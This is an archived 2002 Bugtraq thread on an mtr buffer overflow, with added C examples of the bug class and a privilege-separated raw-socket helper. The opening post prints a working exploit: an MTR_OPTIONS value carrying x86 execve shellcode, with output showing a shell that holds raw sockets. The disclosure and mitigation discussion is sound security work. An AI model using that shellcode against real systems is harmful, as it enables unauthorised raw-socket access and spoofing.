8101206 2002-03-06 15:41 +0100  /39 lines/ Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Sent by: joel@lysator.liu.se
Imported: 2002-03-06  17:59  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21296>
Subject: mtr 0.45, 0.46
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
To: bugtraq@securityfocus.com
Message-ID: <20020306154142.J31779@lagoon.freebsd.lublin.pl>

A few days ago, a new version of mtr was released. The authors wrote
in the CHANGELOG that they fixed a non-exploitable buffer overflow. In
fact, this vulnerability is very easily exploitable and allows an
attacker to gain access to a raw socket, which makes IP spoofing and
other malicious network activity possible.

The sample exploit is TRIVIAL because of the strtok/while loop in the
vulnerable code.

clitoris:/home/venglin/mtr-0.45> uname -smr
Linux 2.4.8-26mdk i686
clitoris:/home/venglin/mtr-0.45> setenv MTR_OPTIONS `perl -e 'print "A "x130 . "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"'`
clitoris:/home/venglin/mtr-0.45> ./mtr
sh-2.05$

At this point, the exec'd shell has a raw socket open:

clitoris:/home/venglin/mtr-0.45> /usr/sbin/lsof | grep raw
sh        17263 venglin    3u   raw                        605400 00000000:00FF->00000000:0000 st=07
sh        17263 venglin    4u   raw                        605401 00000000:0001->00000000:0000 st=07
sh-2.05$ ls -la /proc/self/fd/
total 0
dr-x------    2 venglin  venglin         0 Mar  6 15:40 .
dr-xr-xr-x    3 venglin  venglin         0 Mar  6 15:40 ..
lrwx------    1 venglin  venglin        64 Mar  6 15:40 0 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 1 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 2 -> /dev/pts/6
lrwx------    1 venglin  venglin        64 Mar  6 15:40 3 -> socket:[605400]
lrwx------    1 venglin  venglin        64 Mar  6 15:40 4 -> socket:[605401]
lr-x------    1 venglin  venglin        64 Mar  6 15:40 5 -> /proc/17318/fd

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
(8101206) /Przemyslaw Frasunek <venglin@freebsd.lublin.pl>/(Rewrapped)
Comment in text 8102958 by Rogier Wolff <R.E.Wolff@BitWizard.nl>
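The "strtok/while loop" overflow class the post above describes, shown as an added illustration in C beside its checked counterpart. This is not mtr's source and not the poster's exploit: the array size MAX_ARGS, the function names and the printable "PAYLOAD" marker standing in for the shellcode are assumptions chosen to show the pattern, and the 130-token "A " input is constructed to mirror the post's MTR_OPTIONS value.

```c
/* Added illustration of the strtok/while-loop overflow class described in
 * the post above. Not mtr's source: MAX_ARGS, the function names and the
 * "PAYLOAD" marker standing in for the shellcode are assumptions. */
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 16   /* assumed capacity of the fixed-size argv[] array */

/* Vulnerable shape: each whitespace-separated token is stored and n is
 * never compared with the array's capacity. With more than MAX_ARGS tokens
 * ("A "x130 in the post) the loop writes pointers past the end of argv[]
 * onto whatever the compiler placed after it; the final token, the
 * shellcode, is what those stray pointers point at. Because a real overrun
 * is undefined behaviour, callers here pass an array big enough for the
 * input and read the count to see how far the loop would have gone. */
int split_unchecked(char *opts, char **argv)
{
    int n = 0;
    for (char *tok = strtok(opts, " "); tok; tok = strtok(NULL, " "))
        argv[n++] = tok;                 /* no bound on n */
    argv[n] = NULL;
    return n;
}

/* Hardened shape: stop one slot short of the capacity (the last slot holds
 * the terminating NULL) and report an over-long value instead of silently
 * truncating it. Returns the token count, or -1 if the value does not fit. */
int split_checked(char *opts, char **argv, size_t cap)
{
    size_t n = 0;
    for (char *tok = strtok(opts, " "); tok; tok = strtok(NULL, " ")) {
        if (n + 1 >= cap)
            return -1;
        argv[n++] = tok;
    }
    argv[n] = NULL;
    return (int)n;
}

/* Constructed input mirroring the post's MTR_OPTIONS value: "A " repeated
 * fill times, then the printable marker "PAYLOAD" instead of shellcode.
 * Returns the number of tokens written, or -1 if out is too small. */
int build_options(char *out, size_t outsz, int fill)
{
    size_t used = 0;
    for (int i = 0; i < fill; i++) {
        if (used + 2 >= outsz)
            return -1;
        memcpy(out + used, "A ", 2);
        used += 2;
    }
    if (used + sizeof "PAYLOAD" > outsz)
        return -1;
    memcpy(out + used, "PAYLOAD", sizeof "PAYLOAD");
    return fill + 1;
}

/* How many slots the unchecked loop fills for the post's 130-token value
 * (an oversized array is used so the demo itself cannot overflow). */
int demo_unchecked_slots(void)
{
    char opts[512];
    char *big[256];
    if (build_options(opts, sizeof opts, 130) < 0)
        return -1;
    return split_unchecked(opts, big);
}

/* What the checked loop returns for the same value and a MAX_ARGS array. */
int demo_checked_result(void)
{
    char opts[512];
    char *argv[MAX_ARGS];
    if (build_options(opts, sizeof opts, 130) < 0)
        return -2;
    return split_checked(opts, argv, MAX_ARGS);
}

/* The checked loop on a benign value: token count, NULL-terminated. */
int demo_checked_benign(void)
{
    char opts[] = "-n -c 3";
    char *argv[MAX_ARGS];
    int n = split_checked(opts, argv, MAX_ARGS);
    return (n == 3 && argv[3] == NULL) ? n : -1;
}

int main(void)
{
    printf("unchecked loop fills %d slots of a %d-slot array\n",
           demo_unchecked_slots(), MAX_ARGS);
    printf("checked loop on the same value: %d (rejected)\n", demo_checked_result());
    printf("checked loop on \"-n -c 3\": %d tokens\n", demo_checked_benign());
    return 0;
}
```

The count returned by the unchecked loop (131 for 130 "A" tokens plus the marker) against a 16-slot array is the whole bug: the distance between those two numbers is how far past argv[] the stray pointers land, which is why the post calls the exploit trivial. The checked version fails closed on an over-long MTR_OPTIONS rather than guessing how much to keep.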
8102958 2002-03-06 18:53 +0100  /51 lines/ Rogier Wolff <R.E.Wolff@BitWizard.nl>
Sent by: joel@lysator.liu.se
Imported: 2002-03-07  00:20  by Brevbäraren
External recipient: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21308>
Comment on text 8101206 by Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Subject: Re: mtr 0.45, 0.46
------------------------------------------------------------
From: R.E.Wolff@BitWizard.nl (Rogier Wolff)
To: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Cc: bugtraq@securityfocus.com
Message-ID: <200203061753.SAA02183@cave.bitwizard.nl>

Przemyslaw Frasunek wrote:
> Few days ago, a new version of mtr has been released. Authors wrote

Ah. That's me..... :-) 

As usual, I would have preferred to have heard from you before
posting to BugTraq. 

> in CHANGELOG, that they fixed a non-exploitable buffer overflow.
> In fact, this vulnerability is very easly exploitable and allows
> attacker to gain access to raw socket, which makes possible ip spoofing
> and other malicious network activity.

Have you read the SECURITY document that comes with mtr? It explains
exactly that if you break mtr security, you will get access to the raw
socket.

If you (or your distribution) install mtr setuid, then that's the
risk you take. The mtr distribution doesn't install mtr setuid. Now,
I must confess that I do it myself too. But I know the risks I'm
taking (none: all people who have access to the setuid binary also
have the root password). I'm afraid that of course distributions will
have to make the decision for their users and will choose
'setuid'. mtr is indeed kind of useless without that.

By the way, if you link mtr with gtk and/or curses, then I'm convinced
that you'll be able to find security bugs in those libraries which
allow you to do the same thing....

Anyway, from a security viewpoint, having access to a raw socket is
something that requires root access to get, so normally that will
actually GIVE you root access once you have it. As bugs in the
libraries that mtr links to are almost certain, mtr has root leaks as
soon as it's installed setuid.

I'm glad that the fixes predate the exploits again. :-)

			Roger. 

-- 
** R.E.Wolff@BitWizard.nl ** http://www.BitWizard.nl/ ** +31-15-2137555 **
*-- BitWizard writes Linux device drivers for any device you may have! --*
* There are old pilots, and there are bold pilots.
* There are also old, bald pilots.
(8102958) /Rogier Wolff <R.E.Wolff@BitWizard.nl>/(Rewrapped)
Comment in text 8111323 by Matt Zimmerman <mdz@debian.org>
8111323 2002-03-07 14:58 -0500  /28 lines/ Matt Zimmerman <mdz@debian.org>
Sent by: joel@lysator.liu.se
Imported: 2002-03-08  13:48  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <21319>
Comment on text 8102958 by Rogier Wolff <R.E.Wolff@BitWizard.nl>
Subject: Re: mtr 0.45, 0.46
------------------------------------------------------------
From: Matt Zimmerman <mdz@debian.org>
To: bugtraq@securityfocus.com
Message-ID: <20020307195854.GD8657@alcor.net>

On Wed, Mar 06, 2002 at 06:53:31PM +0100, Rogier Wolff wrote:

> The mtr distribution doesn't install mtr setuid. Now, I must confess that
> I do it myself too. But I know the risks I'm taking (none: All people who
> have access to the setuid binary also have the root password).

Of course, this doesn't entirely eliminate the risk of installing mtr
setuid.  It is not an uncommon situation for an attacker to gain
access to the account of one of these trusted users without gaining
immediate access to their knowledge (the root password).

Have you considered moving the raw socket functionality to a small,
auditable, setuid helper program?  mtr itself could communicate with
the helper via a simple protocol over a pipe, and that would avoid
the problem of security bugs in the UI libraries.  If the helper only
allows the minimum functionality necessary for mtr to work
(send/receive ICMP ECHO_REQUEST/ECHO_RESPONSE with a local source
address?), you could successfully restrict the damage that could be
done if the communication channel were compromised.

-- 
 - mdz
(8111323) /Matt Zimmerman <mdz@debian.org>/(Rewrapped)
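The split Matt Zimmerman proposes, as an added example in C that is not mtr's code and not anything the thread's participants wrote: a small helper opens the raw socket while privileged, drops root for good, and then serves exactly one request shape over a pipe. The "PROBE <ipv4> <ttl>" line protocol, struct probe_req, the reply strings and the limits are assumptions; the UI process (and its gtk/curses libraries) would spawn this helper and talk to it on stdin/stdout.

```c
/* Added example of the privilege-separated helper proposed above. Not
 * mtr's code; the "PROBE <ipv4> <ttl>" line protocol, struct probe_req,
 * the reply strings and the limits are assumptions. */
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

struct probe_req { struct in_addr dst; int ttl; };

/* The only request the helper understands: "PROBE <dotted IPv4> <ttl>" with
 * ttl in 1..255 and nothing after it. Source address, protocol and payload
 * are not expressible over the pipe, which is what bounds the damage if the
 * UI side is compromised. Returns the TTL, or -1 for anything else; req may
 * be NULL when only validation is wanted. */
int parse_request(const char *line, struct probe_req *req)
{
    char verb[8], addr[16], extra[2];
    struct in_addr dst;
    long ttl;
    if (sscanf(line, "%7s %15s %ld %1s", verb, addr, &ttl, extra) != 3)
        return -1;
    if (strcmp(verb, "PROBE") != 0 || ttl < 1 || ttl > 255)
        return -1;
    if (inet_pton(AF_INET, addr, &dst) != 1)
        return -1;
    if (req) {
        req->dst = dst;
        req->ttl = (int)ttl;
    }
    return (int)ttl;
}

/* RFC 1071 ones'-complement sum, computed in network byte order so the
 * stored result is correct on any host. */
uint16_t icmp_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, p += 2)
        sum += (uint32_t)(p[0] << 8 | p[1]);
    if (len)
        sum += (uint32_t)(p[0] << 8);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* ICMP ECHO_REQUEST header (type 8, code 0) with id/seq; returns its length. */
size_t build_echo(uint8_t *pkt, uint16_t id, uint16_t seq)
{
    memset(pkt, 0, 8);
    pkt[0] = 8;
    pkt[4] = (uint8_t)(id >> 8);  pkt[5] = (uint8_t)(id & 0xff);
    pkt[6] = (uint8_t)(seq >> 8); pkt[7] = (uint8_t)(seq & 0xff);
    uint16_t cs = icmp_checksum(pkt, 8);
    pkt[2] = (uint8_t)(cs >> 8);  pkt[3] = (uint8_t)(cs & 0xff);
    return 8;
}

/* Self-check: a header with its checksum filled in sums to zero. */
int echo_verifies(uint16_t id, uint16_t seq)
{
    uint8_t pkt[8];
    size_t n = build_echo(pkt, id, seq);
    return icmp_checksum(pkt, n) == 0;
}

/* Sets the TTL and sends one echo request. No socket (rawfd < 0, as when
 * the helper is not root) is an explicit failure, not a silent no-op. */
int send_probe(int rawfd, const struct probe_req *req, uint16_t id, uint16_t seq)
{
    uint8_t pkt[8];
    if (rawfd < 0 || req == NULL)
        return -1;
    int ttl = req->ttl;
    struct sockaddr_in to = { .sin_family = AF_INET, .sin_addr = req->dst };
    if (setsockopt(rawfd, IPPROTO_IP, IP_TTL, &ttl, sizeof ttl) < 0)
        return -1;
    size_t len = build_echo(pkt, id, seq);
    return sendto(rawfd, pkt, len, 0, (struct sockaddr *)&to, sizeof to) == (ssize_t)len ? 0 : -1;
}

/* Open the raw socket while still privileged, then give up root for good;
 * the descriptor survives the drop. Returns the fd, or -1 on failure. */
int open_raw_and_drop(void)
{
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
    if (setgid(getgid()) < 0 || setuid(getuid()) < 0 ||
        (getuid() != 0 && setuid(0) == 0)) {   /* the drop must be irreversible */
        if (fd >= 0) close(fd);
        return -1;
    }
    return fd;
}

/* Service loop: one request line in, one reply line out over the pipe. */
int main(void)
{
    char line[128];
    struct probe_req req;
    uint16_t id = (uint16_t)getpid(), seq = 0;
    int rawfd = open_raw_and_drop();
    if (rawfd < 0)
        fputs("WARN no raw socket (not root?); requests will fail\n", stderr);
    while (fgets(line, sizeof line, stdin)) {
        if (parse_request(line, &req) < 0)
            fputs("ERR bad request\n", stdout);
        else if (send_probe(rawfd, &req, id, seq++) < 0)
            fputs("ERR send failed\n", stdout);
        else
            fputs("OK\n", stdout);
        fflush(stdout);
    }
    return 0;
}
```

The point of the design is in what parse_request refuses: a compromised UI can ask for an echo request to a destination with a TTL and nothing else, so even full control of the pipe yields no spoofed source addresses or arbitrary packets. The helper is small enough to audit on its own, and because it drops root right after the socket is opened, a bug in its later code does not hand out uid 0 either.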